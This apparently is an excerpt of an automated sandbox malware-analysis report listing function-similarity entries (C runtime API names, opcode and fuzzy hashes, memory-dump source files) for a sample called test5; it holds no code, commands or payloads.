                      • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 634798775-0
                      • Opcode ID: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
                      • Instruction ID: 2f22bbae42e1b10a23c54e6230a4fa42d7c80f9f004dd66ca6039fab29f2baeb
                      • Opcode Fuzzy Hash: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
                      • Instruction Fuzzy Hash: 66515130258F2D9BE668597DE8CD3B97BC2E7F5310F5402ADD459C31D2F952EC824982
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 634798775-0
                      • Opcode ID: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
                      • Instruction ID: e4e4157b20e97a7d60fd3cbd18fa455cfe3406d1a9e582158be44bf2701a909d
                      • Opcode Fuzzy Hash: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
                      • Instruction Fuzzy Hash: 2851FB30A28F199BE7EC5A5D549D3B732C2E7E4310F5402AED45EC31E6EAA0DE4385C5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: clock
                      • String ID:
                      • API String ID: 3195780754-0
                      • Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                      • Instruction ID: 302b46e15ca0afbbc21ca6a2d5af408ca377e1ca329faef0b62b89cfef606f21
                      • Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                      • Instruction Fuzzy Hash: 97215B7140CB289EE778AD9990CA3B6BBC1E7E5360F150A6DE886C3143E5518D4286C6
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: clock
                      • String ID:
                      • API String ID: 3195780754-0
                      • Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                      • Instruction ID: 7599ef8dd08abe194cc92fb2ae91e4ad6c00ba0845d292499315d369463d187d
                      • Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                      • Instruction Fuzzy Hash: 41213BB1C1CB28AFEBB8A9DC504ABB7FAD1E7E5350F11026DE4CE83153E550AD4246C2
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                      • String ID:
                      • API String ID: 1991439119-0
                      • Opcode ID: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
                      • Instruction ID: 79dec47b92fa77cdc7d3212697be0dc563ed2528074a9be95e30a169fda52c58
                      • Opcode Fuzzy Hash: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
                      • Instruction Fuzzy Hash: 8B11C430524E28EBFB9AEF64DCDD7DB73A6E7A4301F840569940AC20E1DE389B44C684
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: malloc$FreeHeap_errno_getptdfree
                      • String ID:
                      • API String ID: 3311824342-0
                      • Opcode ID: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
                      • Instruction ID: 0a5ea394be55af7a83db43d95b38838a8a8d914b59dc02e4e3bdcee112313254
                      • Opcode Fuzzy Hash: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
                      • Instruction Fuzzy Hash: 2FC1D630525E14DFF759DB78E8993F937E6F7A9310F80016AD446C32A1DA39E8428F81
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: malloc$_errno_getptdfree
                      • String ID:
                      • API String ID: 3172138858-0
                      • Opcode ID: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
                      • Instruction ID: 469edc265bcbcabe4e8eaa49735b03dbff4e1c939f6c49c464102c95e3b99516
                      • Opcode Fuzzy Hash: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
                      • Instruction Fuzzy Hash: 0EC1B230935E14DFF79EEB28A8957F633E6F7A9310F90016AD05AC31A1D73899428BC1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                      • String ID: B
                      • API String ID: 1812809483-1255198513
                      • Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                      • Instruction ID: c3314a7a3f11356384e1bc233d8bbddd47f2837916cb90edd78b2862b1aa2203
                      • Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                      • Instruction Fuzzy Hash: D2116334118F489FD754EB58D4897A97AD2F7A8324F50479EA05DC3291CA74D944CB82
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                      • String ID: B
                      • API String ID: 1812809483-1255198513
                      • Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                      • Instruction ID: c3a88227027532db6e5b188a49e9a36e032ac5604ee19abd3cdd6997780a88f9
                      • Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                      • Instruction Fuzzy Hash: F0119330528F088FD758EB18944979673D2F7A8324F5046AEA01DC32A1CA74C944C7C2
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$_errno$_callnewhmalloc
                      • String ID:
                      • API String ID: 2761444284-0
                      • Opcode ID: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
                      • Instruction ID: 62a464b86d1f7914733fb8bda4534a3e580f323fc93a61b2a7328179d6a06a98
                      • Opcode Fuzzy Hash: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
                      • Instruction Fuzzy Hash: 1761CA30208D289BE758AB38D4D97FD77D2F7E4710F900A9DE45BC71C3DE26A9468A81
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: free$_errno$_callnewhmalloc
                      • String ID:
                      • API String ID: 2761444284-0
                      • Opcode ID: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
                      • Instruction ID: b8b88469c261ca358194e341213851d713980e36a12b1bdbbee03d2d6375dcca
                      • Opcode Fuzzy Hash: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
                      • Instruction Fuzzy Hash: 8C618631B24D29ABEA9DEB2894597EE72D3F7E4310F94095DE44EC31D2DF249A0246C2
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _snprintf$_errno_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3442832105-0
                      • Opcode ID: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
                      • Instruction ID: d590ecf21178e5fcb11eb0f8ffd9ddfb55752ffe9d61ac527c0a5b402514c894
                      • Opcode Fuzzy Hash: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
                      • Instruction Fuzzy Hash: 9E61B434518E588FEB54EF28D8897EAB7E6FBE8300F5005A9E44AC3192DF35E945CB41
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _snprintf$_errno_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3442832105-0
                      • Opcode ID: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
                      • Instruction ID: c67f561b4d7ba009ebbd12abb2e34f6fa8fcf7854fb309c1b9506110fb7843f2
                      • Opcode Fuzzy Hash: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
                      • Instruction Fuzzy Hash: DA619530A18E58CFEB95EB58D8857DA73E6FBF4304F500569E44AC3292DF34DA458B82
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: malloc
                      • String ID:
                      • API String ID: 2803490479-0
                      • Opcode ID: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
                      • Instruction ID: ce92724b795f8e71e5f1849a33e73da6708ed0e70957708b4ce9790a3c7bd9c9
                      • Opcode Fuzzy Hash: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
                      • Instruction Fuzzy Hash: 0551C930218E159BDB58DF2CD4C92B977D2FBE5320F8045ADE84BC3286EE30EC428645
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: malloc
                      • String ID:
                      • API String ID: 2803490479-0
                      • Opcode ID: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
                      • Instruction ID: 2e387f2f85efd81f42ac7cb6a0561121147caa2d31d9bb284dfd539adb61c193
                      • Opcode Fuzzy Hash: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
                      • Instruction Fuzzy Hash: 6451C830628E159BEF9C9F6C94897BAB3D6FBD4310F50059DE85FC3286EA20FD164681